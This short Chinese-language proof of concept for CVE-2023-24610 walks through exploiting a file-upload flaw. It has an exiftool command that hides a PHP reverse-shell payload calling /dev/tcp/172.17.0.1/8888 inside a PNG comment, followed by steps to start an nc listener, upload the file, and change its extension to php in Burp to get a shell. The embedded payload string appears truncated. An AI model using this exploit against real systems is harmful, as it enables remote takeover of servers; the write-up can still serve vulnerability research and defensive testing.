这是针对 CVE-2023-24610 的概念验证
首先,我们使用 exiftool 创建一个多语言文件: exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

我们将文件改为 png 格式,以通过前端检查

之后,我们在 8888 端口启动一个 nc 监听器来接收 shell。

下一步是登录应用程序并点击设置

在页面底部,我们看到一个练习标志区域。我们可以通过右侧的编辑按钮上传文件

点击编辑,然后点击浏览,选择我们在第一步创建的“.png”文件

在上传之前,确保我们用 burp 或类似工具拦截了请求。 我们点击上传,并在 burp 中将文件扩展名从“png”改为“php”

我们关闭拦截,以便文件上传成功,并检查之前启动的 nc 监听器。 我们获得了反向 shell,IP 指向我们的 docker 容器。
